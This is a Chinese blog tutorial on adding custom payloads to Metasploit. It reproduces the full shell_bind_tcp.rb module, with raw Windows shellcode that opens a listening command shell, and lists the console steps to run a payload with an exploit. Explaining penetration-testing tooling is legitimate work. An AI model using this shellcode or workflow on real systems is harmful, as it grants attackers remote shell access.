在Metraspolit里添加定制的Payloads

1、metasploit的shellcode,叫做payload,存放在这个目录:
C:\Users\Administrator\AppData\Local\msf32\modules\payloads
注:不同的操作系统当前目录前面位置略有差异,这个我就不多说了。
另外,我的metasploit不是最新版本,不知道新版本这个目录位置是否调整,应该没有吧。

2、metasploit使用的是ruby语言,它用的shellcode看起来是这样的:

##
# $Id: shell_bind_tcp.rb 5773 2008-10-19 21:03:39Z ramon $
##

##
# This file is part of the Metasploit Framework and may be subject to 
# redistribution and commercial restrictions. Please see the Metasploit
# Framework web site for more information on licensing and terms of use.
# http://metasploit.com/projects/Framework/
##


require 'msf/core'
require 'msf/core/handler/bind_tcp'


module Metasploit3

include Msf::Payload::Windows
include Msf::Payload::Single

def initialize(info = {})
super(merge_info(info,
'Name' => 'Windows Command Shell, Bind TCP Inline',
'Version' => '$Revision: 5773 $',
'Description' => 'Listen for a connection and spawn a command shell',
'Author' => 'vlad902',
'License' => MSF_LICENSE,
'Platform' => 'win',
'Arch' => ARCH_X86,
'Handler' => Msf::Handler::BindTcp,
'Session' => Msf::Sessions::CommandShell,
'Payload' =>
{
'Offsets' =>
{
'LPORT' => [ 162, 'n' ],
'EXITFUNC' => [ 308, 'V' ],
},
'Payload' =>
"\xfc\x6a\xeb\x4d\xe8\xf9\xff\xff\xff\x60\x8b\x6c" +
"\x24\x24\x8b\x45\x3c\x8b\x7c\x05\x78\x01\xef\x8b" +
"\x4f\x18\x8b\x5f\x20\x01\xeb\x49\x8b\x34\x8b\x01" +
"\xee\x31\xc0\x99\xac\x84\xc0\x74\x07\xc1\xca\x0d" +
"\x01\xc2\xeb\xf4\x3b\x54\x24\x28\x75\xe5\x8b\x5f" +
"\x24\x01\xeb\x66\x8b\x0c\x4b\x8b\x5f\x1c\x01\xeb" +
"\x03\x2c\x8b\x89\x6c\x24\x1c\x61\xc3\x31\xdb\x64" +
"\x8b\x43\x30\x8b\x40\x0c\x8b\x70\x1c\xad\x8b\x40" +
"\x08\x5e\x68\x8e\x4e\x0e\xec\x50\xff\xd6\x66\x53" +
"\x66\x68\x33\x32\x68\x77\x73\x32\x5f\x54\xff\xd0" +
"\x68\xcb\xed\xfc\x3b\x50\xff\xd6\x5f\x89\xe5\x66" +
"\x81\xed\x08\x02\x55\x6a\x02\xff\xd0\x68\xd9\x09" +
"\xf5\xad\x57\xff\xd6\x53\x53\x53\x53\x53\x43\x53" +
"\x43\x53\xff\xd0\x66\x68\x11\x5c\x66\x53\x89\xe1" +
"\x95\x68\xa4\x1a\x70\xc7\x57\xff\xd6\x6a\x10\x51" +
"\x55\xff\xd0\x68\xa4\xad\x2e\xe9\x57\xff\xd6\x53" +
"\x55\xff\xd0\x68\xe5\x49\x86\x49\x57\xff\xd6\x50" +
"\x54\x54\x55\xff\xd0\x93\x68\xe7\x79\xc6\x79\x57" +
"\xff\xd6\x55\xff\xd0\x66\x6a\x64\x66\x68\x63\x6d" +
"\x89\xe5\x6a\x50\x59\x29\xcc\x89\xe7\x6a\x44\x89" +
"\xe2\x31\xc0\xf3\xaa\xfe\x42\x2d\xfe\x42\x2c\x93" +
"\x8d\x7a\x38\xab\xab\xab\x68\x72\xfe\xb3\x16\xff" +
"\x75\x44\xff\xd6\x5b\x57\x52\x51\x51\x51\x6a\x01" +
"\x51\x51\x55\x51\xff\xd0\x68\xad\xd9\x05\xce\x53" +
"\xff\xd6\x6a\xff\xff\x37\xff\xd0\x8b\x57\xfc\x83" +
"\xc4\x64\xff\xd6\x52\xff\xd0\x68\x7e\xd8\xe2\x73" +
"\x53\xff\xd6\xff\xd0"

}
))
end

end

上述代码是被保存为shell_bind_tcp.rb,放在C:\Users\Administrator\AppData\Local\msf32\modules\payloads\singles\windows目录的(payloads目录下面还有一些子目录,具体请自行查看)。

3、你如果要使用自己的shellcode,就要按照上述payload的样式构造好自己的payload,并放在合适的路径下,然后在metasploit里面就可以用了:
例如我习惯用metasploit的console:
use xxxx(exp name)
set xxxx xxxx(exp option 1)
set xxxx xxxx(exp option 2)
...
set payload xxxx(payload name)
set xxx xxx ...(payload options)
...
exploit

就OK了。

附图:
1、把自己构造好的shellcode/payload放在合适的目录:
40851

2、启动metasploit的console,show payloads就可以看到自己的那个payload了,就可以使用了:
40852
 








本文转sinojelly51CTO博客,原文链接:http://blog.51cto.com/pnig0s1992/401307,如需转载请自行联系原作者






评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值